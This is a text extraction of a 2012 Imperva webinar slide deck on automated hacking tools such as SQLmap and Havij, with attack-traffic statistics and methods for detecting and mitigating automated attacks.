Upload
imperva
View
2.410
Download
0
Tags:
Embed Size (px)
Citation preview
Automated Hacking Tools: The New Rock Stars in the Cyber Underground
© 2012 Imperva, Inc. All rights reserved.
© 2012 Imperva, Inc. All rights reserved.
© 2012 Imperva, Inc. All rights reserved.
Context for HII Reports Introducing Automated Hacking
+ Quantifying Automation + Hacking Automation Use Cases + Sample Tools
Analyzing Real World Data Detection and Mitigation Questions and Answers
2
Agenda
© 2012 Imperva, Inc. All rights reserved.
© 2012 Imperva, Inc. All rights reserved.
Speaker at Industry Events + RSA, Sybase Techwave, Info Security UK, Black Hat
Lecturer on Info Security + Technion - Israel Institute of Technology
Former Security Consultant to Banks and Financial Services Firms Leads the Application Defense Center (ADC)
+ Discovered over 20 commercial application vulnerabilities
– Credited by Oracle, MS-SQL, IBM and others
Presenter: Amichai Shulman – CTO Imperva
Amichai Shulman one of InfoWorld’s “Top 25 CTOs”
© 2012 Imperva, Inc. All rights reserved.
© 2012 Imperva, Inc. All rights reserved.
Hacker Intelligence Initiative is focused at understanding how attackers are operating in practice
+ A different approach from vulnerability research
Data set composition + ~50 real world applications + Anonymous Proxies
More than 18 months of data Powerful analysis system
+ Combines analytic tools with drill down capabilities
4
HII Report Context
© 2012 Imperva, Inc. All rights reserved.
Introducing Automated Hacking
5
© 2012 Imperva, Inc. All rights reserved.
© 2012 Imperva, Inc. All rights reserved.
6
Quantifying Automation
© 2012 Imperva, Inc. All rights reserved.
Quantifying Automation
7
Manual 2%
Automatic 98%
RFI
12%
88%
SQLi
Manual
Automatic
© 2012 Imperva, Inc. All rights reserved.
© 2012 Imperva, Inc. All rights reserved.
Automation affects the magnitude of the threat posed by hacking
8
Hacking Automation Use Cases
Honeypot.org: The Social Dynamics of Hacking
© 2012 Imperva, Inc. All rights reserved.
© 2012 Imperva, Inc. All rights reserved.
Skilled Hackers + Create more powerful tools + Focus not only on finding vulnerabilities but also on robust
automation of their exploit (an engineering challenge)
Professional Hackers (Semi-skilled) + Can increase their business faster and more effectively using
automation + Puts more organizations at risk as potential targets
Unskilled Hackers + Increased potential of incidental damages
9
Hacking Automation Use Cases
© 2012 Imperva, Inc. All rights reserved.
© 2012 Imperva, Inc. All rights reserved.
Botnets + A step further in the evolution of automated hacking + Rather than automating a task it is automation of the entire
operation
Includes all steps of the operation + Target selection + Probing + Exploit
10
Hacking Automation Use Cases
© 2012 Imperva, Inc. All rights reserved.
© 2012 Imperva, Inc. All rights reserved.
Search engine hacking + Discovery phase + Mostly botnet based today
General scanners + Probing of chosen targets
Focused on attack type Focused on individual vulnerability
+ Exist as standalone tools and botnet modules
11
Automated Hacking Tools
© 2012 Imperva, Inc. All rights reserved.
Automated Hacking Tools
High-end + Slick GUI (point and
click) + Evasion techniques + State of the art attack
vectors
Havij + Focused on SQL
Injection attacks + Used in attacks by
Lulzsec and Anonymous
12
© 2012 Imperva, Inc. All rights reserved.
© 2012 Imperva, Inc. All rights reserved.
13
Automated Hacking Tools
© 2012 Imperva, Inc. All rights reserved.
Automated Hacking Tools
Professional + Command line + Ready for
instrumentation
SQLmap + Focused on SQL
Injection
FIMAP + Focused on Remote
File Include
14
© 2012 Imperva, Inc. All rights reserved.
© 2012 Imperva, Inc. All rights reserved.
15
Automated Hacking Tools
© 2012 Imperva, Inc. All rights reserved.
Automated Hacking Tools
WhiteHat flipping sides + Tools aimed at
vulnerability scanning + Automation is essential for
continuous testing of large and complex web applications
+ Inherently easier to operate
Nikto + Public domain,
low end Nessus
+ Public domain (some versions), very friendly GUI
Acunetix + Powerful
commercial tool, stolen licenses are shared among hackers
16
© 2012 Imperva, Inc. All rights reserved.
Analyzing Real World Data
17
© 2012 Imperva, Inc. All rights reserved.
© 2012 Imperva, Inc. All rights reserved.
The type of automation is tightly related to the nature of the vulnerability to be exploited
SQL Injection + Tools that focus on an individual application at a time + High volume, high rate traffic generated against a single
application
RFI + Tools that try to cover as many applications as possible + Low volume traffic when watching a single application
Search Engine Hacking + Need to bypass search engine restrictions + Highly distributed botnets
Type of Automation
© 2012 Imperva, Inc. All rights reserved.
Type of Automation
19
© 2012 Imperva, Inc. All rights reserved.
© 2012 Imperva, Inc. All rights reserved.
RFI Attacks Many sources attack more than one target
Type of Automation
© 2012 Imperva, Inc. All rights reserved.
© 2012 Imperva, Inc. All rights reserved.
A fair amount of attack sources are persistent over time + Persistent source = more than 3 days of activity + 30% of SQLi attacks + 60% of RFI attacks
21
Persistence of Sources
CONFIDENTI
1
10
100
1000
10000
0 5 10 15 20 25 30 35 40 45 50 55 60 65 70 75 80 85 90 95 100
SQLi
Att
acks
(Lo
g sc
ale)
Activity Days
© 2012 Imperva, Inc. All rights reserved.
© 2012 Imperva, Inc. All rights reserved.
RFI Attacks Many consistent attackers
Persistence of Sources
© 2012 Imperva, Inc. All rights reserved.
© 2012 Imperva, Inc. All rights reserved.
RFI Attacks Collect URLs that host infection script Some URLs are being used consistently over time
Persistence of Attack Vectors
© 2012 Imperva, Inc. All rights reserved.
© 2012 Imperva, Inc. All rights reserved.
Many shell URLs are used against more than one target
Persistence of Attack Vectors
© 2012 Imperva, Inc. All rights reserved.
Country of Origin
SQLi
Country Hosts % of Hosts
USA 3994 80
China 355 7
United Kingdom 75 2
Russian Federation 49 1
Canada 40 1
Republic of Korea 33 1
Germany 31 1
Brazil 29 1
India 28 1
France 24 1
SQLi
Country Hosts % of Hosts
China 98 30
USA 78 24
Netherlands 9 3
Morocco 8 2
Egypt 7 2
Luxemburg 7 2
Brazil 7 2
France 7 2
Indonesia 6 2
Russian Federation 6 2
25
Most attack sources are in the US Most high rate automation sources are in China!
© 2012 Imperva, Inc. All rights reserved.
Detection and Mitigation
26
© 2012 Imperva, Inc. All rights reserved.
© 2012 Imperva, Inc. All rights reserved.
Motivation + Automated hacking accounts for a large portion of attack traffic + Being able to detect malicious automation dramatically reduces
the stress on other mechanisms designed to detect specific attacks
Challenge + Hard to implement WITHIN applications as automation can be
applied against each and every part of the application or the underlying application server
General
© 2012 Imperva, Inc. All rights reserved.
© 2012 Imperva, Inc. All rights reserved.
Passive Methods + Watch network traffic “as-is” + Non intrusive, do not affect user experience
Traffic Shape Indicators + We measure suspicious requests (rather than ALL requests) + Measured attributes
– Rate – Rate change (ramp-up speed) – Volume
+ Difficult to measure in an inherently noisy source (NAT) Request Shape Indicators
+ Missing headers + Mismatch between headers and location
28
Detecting Automated Hacking - Passive
© 2012 Imperva, Inc. All rights reserved.
Detecting Automated Hacking - Passive
29
© 2012 Imperva, Inc. All rights reserved.
© 2012 Imperva, Inc. All rights reserved.
Introduce changes into the server response + Test client’s reaction to changes + May affect user experience – use with care + Verify type of user agent
Browsers support Javascript and an appropriate DOM + Client is expected to complete some computation + Application / GW can validate the computed value
Browsers comply with HTML tags (IMG, IFRAME) + Client is expected to access resource referenced by embedded
tags + Failure to access the resources implies that client is an
automated script
30
Detecting Automated Hacking - Active
© 2012 Imperva, Inc. All rights reserved.
© 2012 Imperva, Inc. All rights reserved.
Detected automation feeds into building fingerprints of tools and reputation data for sources
Leveraged when data is collected within a community Recent regulatory changes endorse the concept of
community Drop requests matching fingerprints or coming from ill
reputed sources
31
Mitigation - Wisdom of the Crowds
© 2012 Imperva, Inc. All rights reserved.
© 2012 Imperva, Inc. All rights reserved.
Introduce changes to the response that require a true browser user-agent before letting any further requests within a session
+ Application / GW keeps sending the test for any request not in a validated session
+ A session is validated only if user-agent responds properly
Introduce changes to the response that (based on the previous enforcement) introduce client side latency
+ Challenge the client to solve a mathematical riddle
+ Partial hash collisions are a good example
32
Mitigation – Challenges and Metering
© 2012 Imperva, Inc. All rights reserved.
© 2012 Imperva, Inc. All rights reserved.
Introduce CAPTCHA or other test to tell apart a human operator from a script
33
Mitigation (cont.)
© 2012 Imperva, Inc. All rights reserved.
© 2012 Imperva, Inc. All rights reserved.
Automation is ruling the threat landscape + It accounts for the lion share of attack traffic
Automation is used in various forms + In depth scanning / attack of a single target
+ Wide breadth scanning / attack of multiple applications
+ Distributed scanning / attack of single / multiple applications
34
Summary
© 2012 Imperva, Inc. All rights reserved.
© 2012 Imperva, Inc. All rights reserved.
Detection and mitigation are essential for reducing noise and focusing resources on the most complex attacks
Detection and mitigation are most effectively deployed out side of the application
Detection and mitigation must include a combination of passive and active measures
Detection and mitigation are best utilized within a community that can generate reputation data
35
Summary (cont.)
© 2012 Imperva, Inc. All rights reserved.
© 2012 Imperva, Inc. All rights reserved.
Webinar Materials
Post-Webinar Discussions
Answers to Attendee Questions
Webinar Recording Link Webinar Slides
Join Our LinkedIn Group, Imperva Data Security Direct for…
www.imperva.com
- CONFIDENTIAL -